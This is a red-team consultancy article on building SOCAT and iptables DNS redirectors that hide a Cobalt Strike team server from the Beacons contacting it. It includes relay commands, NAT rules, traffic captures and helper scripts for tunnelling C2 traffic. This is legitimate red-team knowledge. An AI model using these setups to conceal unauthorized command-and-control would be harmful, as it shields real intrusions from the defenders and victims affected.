Simple DNS Redirectors for Cobalt Strike

Authored by: Ernesto Alvarez, Senior Security Consultant, Security Consulting Services

This article describes techniques for creating UDP redirectors that protect Cobalt Strike team servers. Redirectors are one of the recommended mechanisms for hiding a team server; with the HTTP channel, they provide additional points that a Beacon can contact for instructions.

Unlike HTTP Beacons, DNS Beacons do not contact the team server directly, but use the DNS infrastructure for carrying messages. In theory, the team server should be referenced in the DNS records so that all queries for the Command and Control (C2) domain are delivered properly. This would mean exposing the team server to the Internet, which is not desirable.

Just as HTTP redirectors can be used to hide the team server from outside scrutiny, a DNS redirector can be used for the same thing. In the case of DNS, redirectors are just one part of the solution, as alternative domains are also necessary in case the original domain is taken down. We will not cover these aspects here, as we’ll be concentrating on the redirection part.

Redirecting TCP traffic is straightforward. A well-defined set of data identifies a network connection (or flow), and the connection state is explicit and can be easily determined from the packet stream. Several generic proxies (e.g. SOCAT) can proxy TCP connections in user space. Options for secure proxying of TCP connections are also available (stunnel and SSH port forwarding are two well-known examples).

The situation is radically different for UDP. This is due to a few factors:

- UDP is packet oriented, while TCP is byte/connection oriented.

- UDP is stateless, and keeping track of UDP "connections" requires second-guessing the "connection" state.

- UDP is handled very differently from TCP in userland.

In a TCP proxy operation, a connection is clearly defined. The connection signals when it ends (the equivalent of an EOF), so the proxy is always aware of its state and knows unambiguously when to release the connection's resources.

UDP is more challenging: without a way of directly sensing the DNS transaction state, a proxy such as SOCAT cannot know when to release those resources.

Simple Redirector Construction

The obvious solution for building a DNS redirector would be to use a DNS server. There are several choices for these, with differing features. We won’t touch on these options in this article, but will instead focus on simple redirectors that can be installed on minimal Linux systems and have a very small footprint.

Our redirectors will be based on the concept of diverting a UDP flow from the redirector’s local port to the team server in a way that the team server has to send the response back to the redirector, which will relay it to the Beacon.

There are two ways of achieving this goal: piping ports together and NAT.

Port Piping

We are all familiar with the concept of piping from a network port. Anyone can do it using netcat or an equivalent tool. Anyone with experience with any of these tools will also know that redirecting UDP traffic is sometimes problematic. A DNS redirector also has these problems, but they can be kept bounded.

For these tests, we are going to use SOCAT, a UNIX tool used to connect multiple types of inputs and outputs together. This tool can do the same thing as netcat but is more versatile.

Naive SOCAT Redirector

Before we jump into the solution, let's look at the problems by attempting a naive approach to a DNS channel redirector. We run a plain SOCAT relay on the redirector and launch a Beacon pointed at it. The redirector executes the following:

    # socat udp4-listen:53 udp4:teamserver.example.net:53

The initial installation works, and we see the ghost Beacon in the team server. However, any further communication fails. Monitoring the DNS traffic, we see the following:

    # tcpdump -l -n -s 5655 -i eth0 udp port 53
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
    05:40:26.453966 IP 173.194.91.156.62931 > redirector.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
    05:40:26.454317 IP redirector.example.net.56494 > teamserver.example.net.53: 55757% A? 7242b4ba.cobalt-domain.example.net. (51)
    05:40:26.454593 IP teamserver.example.net.53 > redirector.example.net.56494: 55757- 1/0/0 A 0.0.0.0 (100)
    05:40:26.454687 IP redirector.example.net.53 > 173.194.91.156.62931: 55757- 1/0/0 A 0.0.0.0 (100)
    05:41:26.689753 IP 172.253.219.11.49854 > redirector.example.net.53: 56196% A? 7242b4ba.cobalt-domain.example.net. (51)
    05:42:27.217514 IP 172.253.219.11.61868 > redirector.example.net.53: 28170% A? 7242b4ba.cobalt-domain.example.net. (51)
    05:43:27.532055 IP 173.194.91.156.49467 > redirector.example.net.53: 59203% A? 7242b4ba.cobalt-domain.example.net. (51)
    05:44:27.653780 IP 173.194.91.77.59444 > redirector.example.net.53: 14169% A? 7242b4ba.cobalt-domain.example.net. (51)
    05:45:27.770012 IP 173.194.91.141.62374 > redirector.example.net.53: 52473% A? 7242b4ba.cobalt-domain.example.net. (51)
    05:46:28.051530 IP 172.253.219.7.39179 > redirector.example.net.53: 26440% A? 7242b4ba.cobalt-domain.example.net. (51)
    05:47:28.190316 IP 173.194.91.74.45768 > redirector.example.net.53: 41092% A? 7242b4ba.cobalt-domain.example.net. (51)

Well, the Beacon checked in fine, but after the first DNS request the pipeline stalls. This is because the UDP protocol is stateless. SOCAT never learns that the first transaction is over, so it keeps waiting for data from the same source address and port, ignoring all others.

This can easily be solved by telling SOCAT to fork for every new packet source it sees. Below we show our second attempt at building a SOCAT redirector:

    # socat udp4-listen:53,fork udp4:teamserver.example.net:53

    # tcpdump -l -n -s 5655 -i eth0 udp port 53
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on eth0, link-type EN10MB (Ethernet), capture size 5655 bytes
    05:53:45.783953 IP 173.194.91.129.48083 > redirector.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
    05:53:45.784730 IP redirector.example.net.34472 > teamserver.example.net.53: 3962% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
    05:53:45.784860 IP teamserver.example.net.53 > redirector.example.net.34472: 3962- 1/0/0 A 0.0.0.0 (100)
    05:53:45.784954 IP redirector.example.net.53 > 173.194.91.129.48083: 3962- 1/0/0 A 0.0.0.0 (100)
    05:54:00.847401 IP 173.194.91.83.48991 > redirector.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
    05:54:00.848289 IP redirector.example.net.46902 > teamserver.example.net.53: 57475% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
    05:54:00.848436 IP teamserver.example.net.53 > redirector.example.net.46902: 57475- 1/0/0 A 0.0.0.0 (100)
    05:54:00.848541 IP redirector.example.net.53 > 173.194.91.83.48991: 57475- 1/0/0 A 0.0.0.0 (100)
    05:54:15.917608 IP 173.194.91.156.35560 > redirector.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
    05:54:15.918490 IP redirector.example.net.55342 > teamserver.example.net.53: 29854% A? 7242b4ba.cobalt-domain.hlmnet.net. (51)
    05:54:15.918615 IP teamserver.example.net.53 > redirector.example.net.55342: 29854- 1/0/0 A 0.0.0.0 (100)
    05:54:15.918719 IP redirector.example.net.53 > 173.194.91.156.35560: 29854- 1/0/0 A 0.0.0.0 (100)

Our Beacon is now alive and communicating well! SOCAT now waits for packets coming from new sources and forwards them to our team server. While everything appears to be normal, this is unfortunately not the case, as this redirector will not work for long. Let's inspect the process table:

    # ps
      PID TTY          TIME CMD
     5365 pts/0    00:00:00 sudo
     5366 pts/0    00:00:00 bash
     5864 pts/0    00:00:00 socat
     5865 pts/0    00:00:00 socat
     5866 pts/0    00:00:00 socat
     5867 pts/0    00:00:00 socat
     5868 pts/0    00:00:00 socat
     5869 pts/0    00:00:00 socat
     5870 pts/0    00:00:00 socat
     5871 pts/0    00:00:00 socat
     5883 pts/0    00:00:00 socat
     5886 pts/0    00:00:00 socat
     5888 pts/0    00:00:00 socat
     5889 pts/0    00:00:00 socat
     5890 pts/0    00:00:00 socat
     5891 pts/0    00:00:00 socat
     5903 pts/0    00:00:00 socat
     5904 pts/0    00:00:00 socat
     5908 pts/0    00:00:00 socat
     5910 pts/0    00:00:00 socat
     5911 pts/0    00:00:00 socat
     5912 pts/0    00:00:00 socat
     5913 pts/0    00:00:00 socat
     5914 pts/0    00:00:00 socat
     5923 pts/0    00:00:00 ps

This does not look good. SOCAT processes are piling up. Let's stress the redirector a bit by requesting a few screenshots and then check the process table:

    # ps | grep socat | wc -l
    3489

If we weren't root, we would have run out of process slots long ago. Even the superuser will eventually have problems with this redirector:

    # socat udp4-listen:53,fork udp4:teamserver.example.net:53
    2021/03/02 06:09:57 socat[5864] E fork(): Resource temporarily unavailable

As expected, we ran out of resources. Worse, we still have several thousand SOCAT processes waiting. The problem arises because SOCAT does not notice that a transaction has finished and keeps its resources allocated.

Working UDP SOCAT Redirector

Now that we understand the problems involved in UDP proxying, we can build a functional solution. The key is making SOCAT drop each connection once its transaction is complete. A five-second inactivity timeout should do the trick:

    # socat -T 5 udp4-listen:53,fork udp4:teamserver.example.net:53

In the example above, we told SOCAT that if no data is seen for five seconds, it should close the socket and assume that no further communication is needed.

While five seconds is a reasonable default timeout, we can attempt to optimize this value. To fine-tune the timeout, we should understand the problem we're facing. A DNS request is sent to our redirector, which relays it to the team server. Once the team server answers, the transaction is over.

This limits our timeout to something we can control: the round-trip time between the redirector and the team server, including the time needed to process the request. A reasonable value would be twice the RTT between the hosts, to have some safety margin. Since our test hosts are in the same LAN, a timeout of one second should be more than enough for our example.
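As a rough illustration of the sizing rule above, the sketch below turns a measured RTT into a whole-second value for the -T option. The function name timeout_from_rtt_ms and the one-second floor are assumptions made for this example; they are not part of SOCAT.

```shell
#!/bin/sh
# Hypothetical helper: suggest a SOCAT inactivity timeout (in whole seconds)
# from a measured round-trip time given in milliseconds.
# Rule from the text: twice the RTT; here rounded up, never below one second.
timeout_from_rtt_ms() {
    awk -v rtt="$1" 'BEGIN {
        t = 2 * rtt / 1000      # twice the RTT, converted to seconds
        s = int(t)
        if (s < t) s++          # round up to the next whole second
        if (s < 1) s = 1        # floor of one second (assumption)
        print s
    }'
}

# Example usage (assumes the summary line format printed by Linux iputils ping):
#   rtt=$(ping -c 5 -q teamserver.example.net | awk -F/ '/^rtt/ {print $5}')
#   socat -T "$(timeout_from_rtt_ms "$rtt")" udp4-listen:53,fork udp4:teamserver.example.net:53
```

For two hosts on the same LAN the result is the one-second floor, which matches the value chosen for the example in the text.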



Below we show the process usage for five and one second timeouts:

The graph shows that the number of SOCAT processes rises as soon as there is activity, but the timeout causes the number of active processes to reach a plateau and stay at a certain value, depending on the activity and the timeout.
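A process count like the one plotted here could be sampled with a small loop. The sketch below is an assumption about how such numbers might be collected, not the tooling used for the article. The helper name count_procs is hypothetical, and it reads /proc directly so that it also works on minimal Linux systems without ps or pgrep.

```shell
#!/bin/sh
# Hypothetical helper: count running processes whose command name equals $1.
# Reads /proc/<pid>/comm (Linux only), so it does not depend on ps or pgrep.
count_procs() {
    n=0
    for f in /proc/[0-9]*/comm; do
        # A process may exit between the glob and the read; ignore errors.
        if [ "$(cat "$f" 2>/dev/null)" = "$1" ]; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# Example usage: print a timestamped sample once per second.
#   while true; do echo "$(date +%s) $(count_procs socat)"; sleep 1; done
```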

Working SOCAT UDP/TCP Redirector

We now have a working redirector. We can also use SOCAT for UDP to TCP translation. For every UDP packet received, we can fork and open a TCP connection, sending the DNS data via TCP. It is very important not to reuse connections, because UDP is packet oriented while TCP is not. We should never put more than one packet into a TCP connection, because two packets might be joined or split. In theory, SOCAT could still split a single DNS request into two UDP packets on the far side, but this does not happen in practice. Be aware that this risk always exists when doing UDP to TCP translation.

We tell SOCAT to take traffic from port 53, and for each packet, to open a connection to port 9191/tcp on the team server. The timeout is set to one second, which might be a bit too low, considering that TCP is involved:

    # socat -T 1 udp4-listen:53,fork tcp4:teamserver.example.net:9191

Since we're encapsulating our data within TCP, we need to run the following on the team server to convert it back to UDP:

    # socat -T 10 tcp4-listen:9191,fork udp4:127.0.0.1:53

Let's now try generating some traffic and see what happens.





The dip in the middle represents a lapse in activity. The quick timeout allows for fast recovery. Overall, it’s not bad, but we also need to see how many open connections we have.

The numbers are somewhat high because TCP requires a wait period (the TIME_WAIT state) after a connection is closed from the client side. This state covers the case where some control messages are lost, and it should not be removed if the protocol is to operate properly. This is not a problem, though, because the number of allocated resources reaches an equilibrium. A few RTTs after the activity goes down, the resource usage drops as well.

Once we have the translation capability, we can put it to use. With DNS carried over TCP connections, we can use other proxying utilities, like stunnel or SSH's port forwarding, to hide the team server from public scrutiny. The team server can be kept in an isolated network, without being exposed to the Internet.
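One possible arrangement, sketched below under stated assumptions, has the team server open an outbound SSH session to the redirector and expose its local TCP listener there through a remote port forward. The account name tunnel, the use of port 9191 on both ends, and the function names are illustrative only; the article does not prescribe a specific layout. The functions merely wrap the commands and run nothing until they are called.

```shell
#!/bin/sh
# Sketch only: the host names, the "tunnel" account and the function names
# are assumptions made for illustration.

# Run on the team server (isolated network, outbound SSH allowed).
teamserver_side() {
    # Convert incoming TCP connections back into local UDP DNS queries.
    socat -T 10 tcp4-listen:9191,bind=127.0.0.1,fork udp4:127.0.0.1:53 &
    # Remote forward: port 9191 on the redirector's loopback interface
    # leads back to port 9191 on the team server's loopback interface.
    ssh -N -R 127.0.0.1:9191:127.0.0.1:9191 tunnel@redirector.example.net
}

# Run on the redirector (as root, in order to bind UDP port 53).
redirector_side() {
    # One TCP connection per DNS packet, sent into the SSH tunnel.
    socat -T 1 udp4-listen:53,fork tcp4:127.0.0.1:9191
}
```

With this layout the team server needs no inbound ports reachable from the Internet; only UDP port 53 on the redirector is exposed.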

NAT Based Redirectors

Another possible solution involves NAT. The concept behind a NAT redirector is to apply two NAT operations to incoming packets. The packet must be redirected to the team server, but at the same time, the packet must also be translated so that it appears to come from the redirector.

Failing to apply the second operation will cause the team server to answer the DNS query directly to the original sender. That response will be ignored, because it comes from a different address than the DNS server that was queried.

For our NAT redirector, we use Linux’s IPTABLES.

IPTABLES Based Redirector

IPTABLES is also well suited for use as a redirector. The Linux kernel's NAT system automatically keeps track of connection state, even for UDP traffic. The detection is based on timers and inactivity, but the system is well developed and very stable.

The advantage of IPTABLES redirectors is that they're lightning fast, incredibly efficient, and robust. Unlike SOCAT redirectors, however, IPTABLES redirectors cannot convert from one protocol to another, because IPTABLES works by packet mangling.

To create a working redirector, two things need to happen at the same time. Once a DNS query reaches the redirector, it must be redirected to the team server. This requires a DNAT operation.

However, if DNAT is used alone the packet will be diverted without changing the source address. As we already explained, this is not a good result, so we’ll also need to execute a SNAT operation.

The decision to apply the double NAT must be made before either operation takes place, as the DNAT change in the PREROUTING rule will erase important information present in the packet (namely whether this packet is addressed to the redirector or not).

To execute both operations simultaneously, we call the MARK target in the PREROUTING chain, and match the packet using every parameter of interest. Once the packet is marked, we can apply all operations both in the PREROUTING and POSTROUTING chains, completely changing the packet.

One final detail is that IP forwarding must be enabled in the redirector, since all these operations count as a forward, even if the packet is sent through the same interface it came in.

In the end, there are four commands that need to be called:

    # Enable IP forwarding
    echo "1" > /proc/sys/net/ipv4/ip_forward

    # Mark incoming DNS packets with the tag 0x400
    # (my.ip.address stands for the redirector's own address)
    iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination my.ip.address --destination-port 53 -j MARK --set-mark 0x400

    # For every marked packet, apply a DNAT and a SNAT (in this case, a MASQUERADE)
    # (substitute the team server's numeric IP address for teamserver.example.net,
    # since --to-destination expects an address rather than a host name)
    iptables -t nat -A PREROUTING -m mark --mark 0x400 --protocol udp -j DNAT --to-destination teamserver.example.net:53
    iptables -t nat -A POSTROUTING -m mark --mark 0x400 -j MASQUERADE
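To avoid typing addresses by hand, the three iptables commands can be generated from parameters and reviewed before they are applied. The sketch below is one way to do that. The function name dns_redirector_rules and the addresses 192.0.2.10 and 198.51.100.20 (taken from the documentation ranges) are placeholders, not values from the original setup.

```shell
#!/bin/sh
# Hypothetical helper: print the three NAT rules for a DNS redirector.
#   $1: redirector IP address (placeholder)
#   $2: team server IP address (placeholder)
#   $3: packet mark, defaults to 0x400 as in the text
dns_redirector_rules() {
    redirector_ip=$1
    teamserver_ip=$2
    mark=${3:-0x400}
    cat <<EOF
iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination $redirector_ip --destination-port 53 -j MARK --set-mark $mark
iptables -t nat -A PREROUTING -m mark --mark $mark --protocol udp -j DNAT --to-destination $teamserver_ip:53
iptables -t nat -A POSTROUTING -m mark --mark $mark -j MASQUERADE
EOF
}

# Example usage:
#   dns_redirector_rules 192.0.2.10 198.51.100.20          # review the rules
#   dns_redirector_rules 192.0.2.10 198.51.100.20 | sh     # apply them (as root)
#   dns_redirector_rules 192.0.2.10 198.51.100.20 | sed 's/ -A / -D /' | sh   # remove them
```

Printing the rules first keeps the generator side-effect free; nothing touches the firewall until the output is piped to a shell.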

Evaluating the capabilities listed in the proc filesystem, we see that we have 65,536 entries in the translation table (/proc/sys/net/netfilter/nf_conntrack_max), and 16,384 buckets (/proc/sys/net/netfilter/nf_conntrack_buckets). This indicates that even at peak capacity, the lookups should be quick. These are default values and can be easily changed by writing a new number to the file, if necessary.
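The lookup-speed argument can be checked with simple arithmetic: dividing the table size by the number of hash buckets gives the average chain length when the table is full. The helper below is an illustrative sketch (the name conntrack_chain_length is an assumption); with the default values quoted above it yields 4.

```shell
#!/bin/sh
# Hypothetical helper: average number of entries per hash bucket when the
# conntrack table is completely full (integer division).
conntrack_chain_length() {
    max_entries=$1
    buckets=$2
    echo $(( max_entries / buckets ))
}

# With the values quoted in the text: 65536 / 16384
conntrack_chain_length 65536 16384

# On a live Linux system the inputs could be read from the proc filesystem:
#   conntrack_chain_length \
#       "$(cat /proc/sys/net/netfilter/nf_conntrack_max)" \
#       "$(cat /proc/sys/net/netfilter/nf_conntrack_buckets)"
# Raising the table size (as root) is a single write; 131072 is only an example:
#   echo 131072 > /proc/sys/net/netfilter/nf_conntrack_max
```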

The system keeps track of the traffic passing through the redirector, so no action is needed for returning packets since they are translated back automatically.



To evaluate the performance of the redirector, we can measure the number of active NAT entries and how this number changes as the system is loaded. To measure this, we can read /proc/sys/net/netfilter/nf_conntrack_count.
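A simple way to record this value over time is to poll the file at a fixed interval. The sketch below is an assumption about how such a measurement could be scripted, not the method used to produce the article's graph; sample_counter is a hypothetical name.

```shell
#!/bin/sh
# Hypothetical helper: print "<unix time> <value>" lines for a counter file.
#   $1: file to read, e.g. /proc/sys/net/netfilter/nf_conntrack_count
#   $2: seconds to wait between samples
#   $3: number of samples to take
sample_counter() {
    sc_file=$1
    sc_interval=$2
    sc_total=$3
    sc_i=0
    while [ "$sc_i" -lt "$sc_total" ]; do
        printf '%s %s\n' "$(date +%s)" "$(cat "$sc_file")"
        sc_i=$((sc_i + 1))
        # Do not sleep after the final sample.
        if [ "$sc_i" -lt "$sc_total" ]; then
            sleep "$sc_interval"
        fi
    done
}

# Example usage: one sample per second for five minutes, saved for plotting.
#   sample_counter /proc/sys/net/netfilter/nf_conntrack_count 1 300 > conntrack.log
```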

Our experiment starts with a Beacon signaling at 15 second intervals. The Beacon is then made to signal continuously, followed by a high activity period. Once this activity period is over, the Beacon is reconfigured to its initial value of 15 seconds between polls.

In the test above we can see that the number of occupied slots depends on the network activity. With just one Beacon polling at 15 second intervals, the number of conntrack slots in use stays below 10. If we switch to no delay, the value quickly grows to about 500, depending on available throughput. When heavy activity is requested, the number of tracked connections rises steadily to 2500 and plateaus at 2700. Once activity ceases, the tracked connections decrease for around 90 seconds, at which point they have all expired and the value stabilizes below 10.

IPTABLES redirectors perform quite well with very modest resources, even with default settings. This is not surprising, given the nature of the Linux kernel. Redirectors like this one can easily be deployed on the smallest computers or cloud instances. IPTABLES redirectors, once set up, are pretty much foolproof.

Summary

In this article, we saw three different implementations of DNS Beacon redirectors. Though these implementations have different advantages and disadvantages, they are ultimately all very usable.

The IPTABLES based redirector is the quickest and has the smallest footprint: it is included by default in the kernel and needs just four commands.

The SOCAT based redirectors are similar to each other, the main difference being whether traffic is converted to TCP or not. UDP redirectors are the simplest, but TCP redirectors have the advantage that TCP connections are easier to encapsulate, which helps in special cases such as when the traffic must be tunneled via SSH.

| | Resource usage | Speed | Versatility | Ease of Use | Stability |
|---|---|---|---|---|---|
| SOCAT TCP | - | 0 | ++ | + | 0 |
| SOCAT UDP | + | + | + | ++ | + |
| IPTABLES | ++ | ++ | 0 | ++ | ++ |
